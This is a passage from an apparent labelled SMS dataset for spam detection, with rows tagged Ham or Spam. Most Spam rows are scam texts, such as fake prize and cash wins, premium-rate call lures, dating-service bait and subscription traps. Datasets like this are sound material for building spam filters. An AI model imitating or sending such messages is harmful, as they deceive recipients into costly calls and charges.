does he do that keeps him from coming to his Queen, hmmm ? Doesn't he ache to speak to me ? Miss me desparately ? 446 | Spam Your credits have been topped up for http://www.bubbletext.com Your renewal Pin is tgxxrz 447 | Ham ALSO TELL HIM I SAID HAPPY BIRTHDAY 448 | Ham Cheers for the card ... Is it that time of year already? 449 | Spam Refused a loan? Secured or Unsecured? Can't get credit? Call free now 0800 195 6669 or text back 'help' & we will! 450 | Spam Last Chance! Claim ur £150 worth of discount vouchers today! Text SHOP to 85023 now! SavaMob, offers mobile! T Cs SavaMob POBOX84, M263UZ. £3.00 Sub. 16 451 | Ham Goodmorning today i am late for <DECIMAL> min. 452 | Ham For me the love should start with attraction.i should feel that I need her every time around me.she should be the first thing which comes in my thoughts.I would start the day and end it with her.she s 453 | Spam You've won tkts to the EURO2004 CUP FINAL or £800 CASH, to collect CALL 09058099801 b4190604, POBOX 7876150ppm 454 | Spam HMV BONUS SPECIAL 500 pounds of genuine HMV vouchers to be won. Just answer 4 easy questions. Play Now! Send HMV to 86688 More info:www.100percent-real.com 455 | Spam Natalja (25/F) is inviting you to be her friend. Reply YES-440 or NO-440 See her: www.SMS.ac/u/nat27081980 STOP? Send STOP FRND to 62468 456 | Spam This is the 2nd attempt to contract U, you have won this weeks top prize of either £1000 cash or £200 prize. Just call 09066361921 457 | Spam Free-message: Jamster!Get the crazy frog sound now! For poly text MAD1, for real text MAD2 to 88888. 6 crazy sounds for just 3 GBP/week! 16+only! T&C's apply 458 | Spam Congrats! 2 mobile 3G Videophones R yours. call 09061744553 now! videochat wid ur mates, play java games, Dload polyH music, noline rentl. bx420. ip4. 5we. 150pm 459 | Ham "Edison has rightly said, ""A fool can ask more questions than a wise man can answer"" Now you know why all of us are speechless during ViVa.. GM,GN,GE,GNT:-)" 460 | Ham This pen thing is beyond a joke. Wont a Biro do? Don't do a masters as can't do this ever again! 461 | Spam You are awarded a SiPix Digital Camera! call 09061221061 from landline. Delivery within 28days. T Cs Box177. M221BP. 2yr warranty. 150ppm. 16 . p p£3.99 462 | Ham Hey u still at the gym? 463 | Spam 44 7732584351, Do you want a New Nokia 3510i colour phone DeliveredTomorrow? With 300 free minutes to any mobile + 100 free texts + Free Camcorder reply or call 08000930705. 464 | Ham My friend, she's studying at warwick, we've planned to go shopping and to concert tmw, but it may be canceled, havn't seen for ages, yeah we should get together sometime! 465 | Ham BABE !!! I miiiiiiissssssssss you ! I need you !!! I crave you !!! :-( ... Geeee ... I'm so sad without you babe ... I love you ... 466 | Ham Aiyo... U always c our ex one... I dunno abt mei, she haven reply... First time u reply so fast... Y so lucky not workin huh, got bao by ur sugardad ah...gee.. 467 | Spam FreeMsg: Claim ur 250 SMS messages-Text OK to 84025 now!Use web2mobile 2 ur mates etc. Join Txt250.com for 1.50p/wk. T&C BOX139, LA32WU. 16 . Remove txtX or stop 468 | Ham Joy's father is John. Then John is the ____ of Joy's father. If u ans ths you hav <#> IQ. Tis s IAS question try to answer. 469 | Ham I get out of class in bsn in like <#> minutes, you know where advising is? 470 | Spam accordingly. I repeat, just text the word ok on your mobile phone and send 471 | Spam CALL 09090900040 & LISTEN TO EXTREME DIRTY LIVE CHAT GOING ON IN THE OFFICE RIGHT NOW TOTAL PRIVACY NO ONE KNOWS YOUR [sic] LISTENING 60P MIN 24/7MP 0870753331018+ 472 | Spam WIN a year supply of CDs 4 a store of ur choice worth £500 & enter our £100 Weekly draw txt MUSIC to 87066 Ts&Cs www.Ldew.com.subs16+1win150ppmx3 473 | Spam FreeMsg Hey there darling it's been 3 week's now and no word back! I'd like some fun you up for it still? Tb ok! XxX std chgs to send, £1.50 to rcv 474 | Spam Hard LIVE 121 chat just 60p/min. Choose your girl and connect LIVE. Call 09094646899 now! Cheap Chat UK's biggest live service. VU BCM1896WC1N3XX 475 | Spam Please call our customer service representative on 0800 169 6031 between 10am-9pm as you have WON a guaranteed £1000 cash or £5000 prize! 476 | Spam You won't believe it but it's true. It's Incredible Txts! Reply G now to learn truly amazing things that will blow your mind. From O2FWD only 18p/txt 477 | Spam Someonone you know is trying to contact you via our dating service! To find out who it could be call from your mobile or landline 09064015307 BOX334SK38ch 478 | Ham Hey... Thk we juz go accordin to wat we discussed yest lor, except no kb on sun... Cos there's nt much lesson to go if we attend kb on sat... 479 | Ham Aight, I'll text you when I'm back 480 | Spam Bored of speed dating? Try SPEEDCHAT, txt SPEEDCHAT to 80155, if you don't like em txt SWAP and get a new chatter! Chat80155 POBox36504W45WQ 150p/msg rcd 16 481 | Ham Or I guess <#> min 482 | Ham Awesome, I remember the last time we got somebody high for the first time with diesel :V 483 | Spam Ur cash-balance is currently 500 pounds - to maximize ur cash-in now send GO to 86688 only 150p/meg. CC: 08718720201 HG/Suite342/2lands Row/W1j6HL 484 | Ham Hi ....My engagement has been fixd on <#> th of next month. I know its really shocking bt....hmm njan vilikkam....t ws al of a sudn;-(. 485 | Ham What's up my own oga. Left my phone at home and just saw ur messages. Hope you are good. Have a great weekend. 486 | Ham Alright. I'm out--have a good night! 487 | Spam "For your chance to WIN a FREE Bluetooth Headset then simply reply back with ""ADP""" 488 | Spam Free 1st week entry 2 TEXTPOD 4 a chance 2 win 40GB iPod or £250 cash every wk. Txt POD to 84128 Ts&Cs www.textpod.net custcare 08712405020. 489 | Spam Todays Voda numbers ending with 7634 are selected to receive a £350 reward. If you have a match please call 08712300220 quoting claim code 7684 standard rates apply. 490 | Ham Just got to <#> 491 | Ham Oh...i asked for fun. Haha...take care. ü 492 | Spam "You can stop further club tones by replying ""STOP MIX"" See my-tone.com/enjoy. html for terms. Club tones cost GBP4.50/week. MFL, PO Box 1146 MK45 2WT (2/3)" 493 | Ham We have pizza if u want 494 | Ham Tee hee. Off to lecture, cheery bye bye. 495 | Spam We tried to contact you re our offer of New Video Phone 750 anytime any network mins HALF PRICE Rental camcorder call 08000930705 or reply for delivery Wed 496 | Spam Someone has contacted our dating service and entered your phone because they fancy you! To find out who it is call from a landline 09111032124 . PoBox12n146tf150p 497 | Ham Good afternoon, my love. It was good to see your words on YM and get your tm. Very smart move, my slave ... *smiles* ... I drink my coffee and await you. 498 | Spam SMS AUCTION You have won a Nokia 7250i. This is what you get when you win our FREE auction. To take part send Nokia to 86021 now. HG/Suite342/2Lands Row/W1JHL 16+ 499 | Spam 2p per min to call Germany 08448350055 from your BT line. Just 2p per min. Check PlanetTalkInstant.com for info & T's & C's. Text stop to opt out 500 | Ham Yup. Izzit still raining heavily cos i'm in e mrt i can't c outside. 501 | Ham Are you this much buzy 502 | Spam UR GOING 2 BAHAMAS! CallFREEFONE 08081560665 and speak to a live operator to claim either Bahamas cruise of£2000 CASH 18+only. To opt out txt X to 07786200117 503 | Spam it to 80488. Your 500 free text messages are valid until 31 December 2005. 504 | Ham Goodmorning, today i am late for <DECIMAL> min. 505 | Ham Pls send me a comprehensive mail about who i'm paying, when and how much. 506 | Ham Heart is empty without love.. Mind is empty without wisdom.. Eyes r empty without dreams & Life is empty without frnds.. So Alwys Be In Touch. Good night & sweet dreams 507 | Spam U are subscribed to the best Mobile Content Service in the UK for £3 per ten days until you send STOP to 83435. Helpline 08706091795. 508 | Spam Congratulations U can claim 2 VIP row A Tickets 2 C Blu in concert in November or Blu gift guaranteed Call 09061104276 to claim TS&Cs www.smsco.net cost£3.75max 509 | Ham I had a good time too. Its nice to do something a bit different with my weekends for a change. See ya soon 510 | Spam 18 days to Euro2004 kickoff! U will be kept informed of all the latest news and results daily. Unsubscribe send GET EURO STOP to 83222. 511 | Ham I wnt to buy a BMW car urgently..its vry urgent.but hv a shortage of <#> Lacs.there is no source to arng dis amt. <#> lacs..thats my prob 512 | Spam You have won a Nokia 7250i. This is what you get when you win our FREE auction. To take part send Nokia to 86021 now. HG/Suite342/2Lands Row/W1JHL 16+ 513 | Spam Promotion Number: 8714714 - UR awarded a City Break and could WIN a £200 Summer Shopping spree every WK. Txt STORE to 88039 . SkilGme. TsCs087147403231Winawk!Age16 £1.50perWKsub 514 | --------------------------------------------------------------------------------